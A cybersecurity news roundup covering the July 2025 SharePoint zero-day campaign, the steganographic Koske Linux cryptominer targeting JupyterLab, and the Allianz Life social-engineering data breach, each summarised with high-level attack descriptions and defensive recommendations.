Microsoft SharePoint Zero-Day Attacks Target Hundreds of Organizations Globally
In July 2025, multiple zero-day vulnerabilities in Microsoft SharePoint were exploited in a coordinated global campaign, targeting banks, educational institutions, healthcare, government agencies, and enterprises, with more than 400 confirmed victims across North America, Europe, and Asia. These exploits allowed for unauthenticated remote code execution and administrative takeover, leading to dire warnings from both Microsoft and cybersecurity authorities worldwide.
Overview of the Vulnerabilities
Two critical vulnerabilities, discovered and demonstrated at the Pwn2Own contest in May 2025, allowed attackers to bypass SharePoint’s built-in security controls. These flaws, with CVSS scores of 9.8 and 7.1 respectively, permitted attackers to execute arbitrary code and obtain administrative access on unpatched on-premises SharePoint servers.
The initial patches released on July 8 proved insufficient; attackers rapidly adapted, developing additional exploitation techniques that circumvented early mitigations. Consequently, tens of thousands of servers remained exposed even after the first remediation was released.
Attribution and Campaign Details
Microsoft’s investigation linked the campaign to three China-based threat actor groups (Linen Typhoon, Violet Typhoon, and Storm-2603). Storm-2603, in particular, was seen coupling the SharePoint exploits with the deployment of Warlock ransomware. Notably, the US National Nuclear Security Administration was among the targeted organizations.
Attackers demonstrated intricate knowledge of SharePoint internals, employing custom payloads that allowed persistent, stealthy access to sensitive files managed across business-critical applications like Teams, OneDrive, and Word.
Mitigation Recommendations
Given the campaign’s scope and sophistication, CISA and Microsoft jointly issued urgent guidance including immediate patching, key rotations, and—in cases where servers are at end-of-life—removing public internet access. Emergency security bulletins emphasized the potential for lateral movement, advising the use of network segmentation and thorough forensic audits in compromised environments.
AI-Enabled Koske Linux Malware Uses Steganography and JupyterLab Attacks for Stealthy Cryptomining
In late July 2025, cybersecurity researchers uncovered a novel Linux malware strain, named “Koske,” which leverages AI-assisted polymorphism, steganography, and exploitation of JupyterLab misconfigurations to deploy in-memory cryptomining rootkits that evade conventional detection methods.
Technical Characteristics of Koske Malware
Koske is notable for its use of polyglot JPEG files—seemingly benign panda images—containing executable code, a steganographic technique that enables the malware to bypass antivirus and endpoint detection solutions. The images embed AI-generated payloads, allowing the code to morph between executions and resist static and behavioral analysis.
Upon successful initial infection, typically via exposed or misconfigured JupyterLab instances (potentially through exploitation of CVE-2025-30370), the malware launches a series of persistence mechanisms. These include fileless execution using the system’s memory and covert network communications tunneled through legitimate web services.
Attack Chain and Evasion Strategies
After gaining access, Koske establishes long-term presence by creating web shells and bypassing reboots or basic restoration attempts. Its cryptomining operations are modular and throttle resources to avoid triggering performance-related alerts.
The sophistication of the malware’s design suggests ongoing active development, with AI innovation reducing signature overlaps and increasing the challenge for defenders hunting these threats using traditional indicators of compromise.
Target Environment and Response Recommendations
Koske primarily targets organizations running scientific computing and machine learning workloads, where unmanaged or poorly secured Jupyter infrastructure is common. Security professionals are urged to audit all cloud and on-premises JupyterLab deployments, update or firewall public-facing instances, and inspect network traffic for unusual outbound connections from servers hosting image-processing utilities.
Allianz Life Insurance Supply-Chain Data Breach Exposes Information of 1.4 Million U.S. Customers
On July 16, 2025, Allianz Life Insurance disclosed a significant data breach, stemming from a supply-chain compromise affecting its cloud-based customer relationship management (CRM) system. Attackers, using targeted social engineering, accessed sensitive information for a majority of Allianz’s 1.4 million U.S. policyholders and select employees.
Attack Methodology and Impact
The breach reportedly originated through social engineering of helpdesk agents from a third-party service provider, resulting in the agents divulging network credentials and performing multifactor authentication resets without proper identity verification. This lapse granted the attackers unauthorized access to the insurer’s cloud infrastructure.
While Allianz’s investigation, in collaboration with the FBI, found no evidence that attackers moved laterally beyond the CRM environment, the exposed data included personal and policy information, raising significant privacy and regulatory concerns. Allianz began issuing state-required notifications to affected individuals and authorities, as required by U.S. law.
Broader Implications and Industry Context
The Allianz breach is one of several high-profile social engineering and supply-chain incidents in the insurance sector reported in recent months, highlighting a persistent threat vector where sophisticated adversaries exploit trusted third-party relationships and human error, bypassing many technical controls.
Experts recommend strict access control processes for all vendors, robust helpdesk authentication protocols, and regular audits of multifactor authentication reset procedures. Early detection of credential misuse remains critical for containment and recovery efforts.